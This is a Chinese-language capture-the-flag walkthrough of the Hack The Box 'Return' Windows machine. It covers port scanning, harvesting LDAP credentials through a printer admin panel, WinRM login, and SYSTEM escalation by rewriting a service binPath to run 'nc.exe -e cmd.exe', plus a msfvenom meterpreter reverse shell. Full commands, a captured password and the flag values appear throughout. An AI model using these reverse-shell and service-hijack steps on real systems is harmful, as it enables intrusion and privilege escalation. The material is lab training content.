目录
连接至HTB服务器并启动靶机
使用nmap扫描靶机开放端口
将靶机开放端口进行脚本、服务扫描
使用浏览器访问靶机80端口并进入Setting选项
将其修改为本地IP,并在本地侧开启nc监听389端口
查看user_flag内容
USER_FLAG:de9d4982df48629d7457ef224c1a5f37
查看svc-printer用户信息
利用系统服务提权
列出系统安装的服务
重启VGAuthService服务
后渗透板块
将reverse_shell.exe文件上传至靶机
ROOT_FLAG:14b7d8d1c27eb289c95067289fafd005
连接至HTB服务器并启动靶机
靶机IP:10.10.11.108
分配IP:10.10.16.6
使用nmap扫描靶机开放端口
nmap -p- --min-rate=1500 -T4 -sS -Pn {TARGET_IP} -oN nmap_result.txt┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p- --min-rate=1500 -T4 -sS -Pn 10.10.11.108 -oN nmap_result.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-19 08:03 EDT
Nmap scan report for 10.10.11.108
Host is up (0.073s latency).
Not shown: 65509 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49671/tcp open unknown
49674/tcp open unknown
49675/tcp open unknown
49679/tcp open unknown
49682/tcp open unknown
49694/tcp open unknown
49720/tcp open unknownNmap done: 1 IP address (1 host up) scanned in 29.16 seconds
将靶机开放端口进行脚本、服务扫描
nmap -p`cat nmap_result.txt | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//` -sCV {TARGET_IP}┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p`cat nmap_result.txt | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//` -sCV 10.10.11.108
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-19 09:09 EDT
Nmap scan report for 10.10.11.108
Host is up (0.11s latency).PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: HTB Printer Admin Panel
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-19 13:16:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
49720/tcp open msrpc Microsoft Windows RPC
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6m44s
| smb2-time:
| date: 2024-10-19T13:16:58
|_ start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.23 seconds
使用浏览器访问靶机80端口并进入Setting选项
经过Yakit抓包,可以确定只有Server Address为动态参数输入
将其修改为本地IP,并在本地侧开启nc监听389端口
点击Update发包后,本地nc收到回显
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 389
listening on [any] 389 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.11.108] 65387
0*`%return\svc-printer�
1edFg43012!!
由回显可得打印机凭证
用户:svc-printer
密码:1edFg43012!!
由开头的端口扫描可知,靶机已开启5985端口,尝试通过WinRM连接至靶机
evil-winrm -i {TARGET_IP} -u svc-printer -p '1edFg43012!!'┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# evil-winrm -i 10.10.11.108 -u svc-printer -p '1edFg43012!!'
Evil-WinRM shell v3.6
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami
return\svc-printer
在C:\Users\svc-printer\Desktop目录下找到user_flag
查看user_flag内容
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> dir
Directory: C:\Users\svc-printer\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/19/2024 3:50 AM 34 user.txt
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> type user.txt
de9d4982df48629d7457ef224c1a5f37
USER_FLAG:de9d4982df48629d7457ef224c1a5f37
查看svc-printer用户信息
net user svc-printer*Evil-WinRM* PS C:\Users\svc-printer\Documents> net user svc-printer
User name svc-printer
Full Name SVCPrinter
Comment Service Account for Printer
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires NeverPassword last set 5/26/2021 1:15:13 AM
Password expires Never
Password changeable 5/27/2021 1:15:13 AM
Password required Yes
User may change password YesWorkstations allowed All
Logon script
User profile
Home directory
Last logon 5/26/2021 1:39:29 AMLogon hours allowed All
Local Group Memberships *Print Operators *Remote Management Use
*Server Operators
Global Group memberships *Domain Users
The command completed successfully.
由回显可见该用户拥有服务器控制权
利用系统服务提权
将本地nc.exe上传至靶机
*Evil-WinRM* PS C:\Users\svc-printer\Documents> upload nc.exe
Info: Uploading /home/kali/Desktop/temp/nc.exe to C:\Users\svc-printer\Documents\nc.exe
Data: 51488 bytes of 51488 bytes copied
Info: Upload successful!*Evil-WinRM* PS C:\Users\svc-printer\Documents> dir
Directory: C:\Users\svc-printer\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/19/2024 7:21 AM 38616 nc.exe
列出系统安装的服务
services
随便挑选一个有特权的服务(如:VGAuthService)修改它的二进制路径
sc.exe config VGAuthService binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe {NATIVE_IP} {NATIVE_PORT}"*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe config VGAuthService binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.16.6 1425"
[SC] ChangeServiceConfig SUCCESS
本地侧nc开启监听
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
重启VGAuthService服务
sc.exe stop VGAuthService
sc.exe start VGAuthService┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.11.108] 49182
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.C:\Windows\system32>whoami
whoami
nt authority\system
后渗透板块
由于该反弹shell依赖服务回环,但当靶机系统检测到服务未成功启动将终止进程
所以我们尝试在Metasploit中生成一个反弹shell,利用Meterpreter将反弹shell转移进程
msfvenom -p windows/meterpreter/reverse_tcp LHOST={NATIVE_IP} LPORT={NATIVE_PORT} -f exe > reverse_shell.exe┌──(root㉿kali)-[/home/…/Desktop/tool/impacket/examples]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.6 LPORT=1426 -f exe > reverse_shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
将reverse_shell.exe文件上传至靶机
*Evil-WinRM* PS C:\Users\svc-printer\Documents> upload reverse_shell.exe
Info: Uploading /home/kali/Desktop/temp/reverse_shell.exe to C:\Users\svc-printer\Documents\reverse_shell.exe
Data: 98400 bytes of 98400 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-printer\Documents> ls
Directory: C:\Users\svc-printer\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/19/2024 7:21 AM 38616 nc.exe
-a---- 10/19/2024 8:44 AM 73802 reverse_shell.exe
攻击机启动msfconsole并使用exploit/multi/handler模块
use exploit/multi/handler配置好监听参数,开启监听
msf6 exploit(multi/handler) > set LHOST 10.10.16.6
LHOST => 10.10.16.6
msf6 exploit(multi/handler) > set LPORT 1426
LPORT => 1426msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
再次修改VGAuthService服务二进制路径
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe config VGAuthService binPath="C:\Users\svc-printer\Documents\reverse_shell.exe"
[SC] ChangeServiceConfig SUCCESS
重启VGAuthService服务
sc.exe stop VGAuthService
sc.exe start VGAuthService成功收到回显
[*] Started reverse TCP handler on 10.10.16.6:1426
[*] Sending stage (176198 bytes) to 10.10.11.108
[*] Meterpreter session 1 opened (10.10.16.6:1426 -> 10.10.11.108:49320) at 2024-10-19 12:21:06 -0400
查看靶机系统进程
psmeterpreter > ps
Process List
============PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
60 540 dwm.exe x64 1 Window Manager\DWM-1 C:\Windows\System32\dwm.exe
88 4 Registry x64 0
268 4 smss.exe x64 0
312 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
368 360 csrss.exe x64 0
472 620 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
476 360 wininit.exe x64 0
484 468 csrss.exe x64 1
532 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
540 468 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
620 476 services.exe x64 0
628 476 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
700 620 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
768 620 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
832 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
852 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
896 620 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
912 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
940 620 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
948 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1072 620 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1080 620 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1160 620 reverse_shell.exe x86 0 NT AUTHORITY\SYSTEM C:\Users\svc-printer\Documents\reverse_shell.exe
1180 620 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1260 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1336 620 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1348 620 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1416 620 vm3dservice.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vm3dservice.exe
1472 620 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1480 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1504 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1520 620 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1556 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1572 620 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1712 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1748 620 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1804 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1896 620 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1904 620 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1912 620 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1924 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1980 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2000 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2012 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2052 620 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
2072 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2112 620 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
2160 852 wsmprovhost.exe x64 0 RETURN\svc-printer C:\Windows\System32\wsmprovhost.exe
2276 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2332 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2416 620 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
2444 620 dfssvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dfssvc.exe
2508 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2672 476 fontdrvhost.exe x64 0 Font Driver Host\UMFD-0 C:\Windows\System32\fontdrvhost.exe
2680 540 fontdrvhost.exe x64 1 Font Driver Host\UMFD-1 C:\Windows\System32\fontdrvhost.exe
2724 2160 reverse_shell.exe x86 0 RETURN\svc-printer C:\Users\svc-printer\Documents\reverse_shell.exe
2764 620 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
2800 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2816 620 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
2836 620 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
2868 620 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
2880 620 dfsrs.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dfsrs.exe
2896 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2920 620 dns.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dns.exe
2944 620 ismserv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\ismserv.exe
2996 620 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
3020 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3060 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3068 620 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
3248 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3592 180 cmd.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\SysWOW64\cmd.exe
3596 852 wsmprovhost.exe x64 0 RETURN\svc-printer C:\Windows\System32\wsmprovhost.exe
3640 852 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
3728 620 dllhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dllhost.exe
3896 3596 sc.exe x64 0 RETURN\svc-printer C:\Windows\System32\sc.exe
3956 620 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
4116 540 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\LogonUI.exe
4196 3896 conhost.exe x64 0 RETURN\svc-printer C:\Windows\System32\conhost.exe
4528 852 wsmprovhost.exe x64 0 RETURN\svc-printer C:\Windows\System32\wsmprovhost.exe
4616 3592 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
4980 620 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
选择其中一个svchost.exe进程,将Meterpreter进程转移实现稳定连接
meterpreter > migrate 4980
[*] Migrating from 1160 to 4980...
[*] Migration completed successfully.
查找root_flag位置
dir /s root.txtC:\Windows\system32>whoami
whoami
nt authority\systemC:\Windows\system32>cd C:\
cd C:\C:\>dir /s root.txt
dir /s root.txt
Volume in drive C has no label.
Volume Serial Number is 3A0C-428EDirectory of C:\Users\Administrator\Desktop
10/19/2024 03:50 AM 34 root.txt
1 File(s) 34 bytesTotal Files Listed:
1 File(s) 34 bytes
0 Dir(s) 8,812,064,768 bytes free
查看root_flag内容
type C:\Users\Administrator\Desktop\root.txtC:\>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
14b7d8d1c27eb289c95067289fafd005
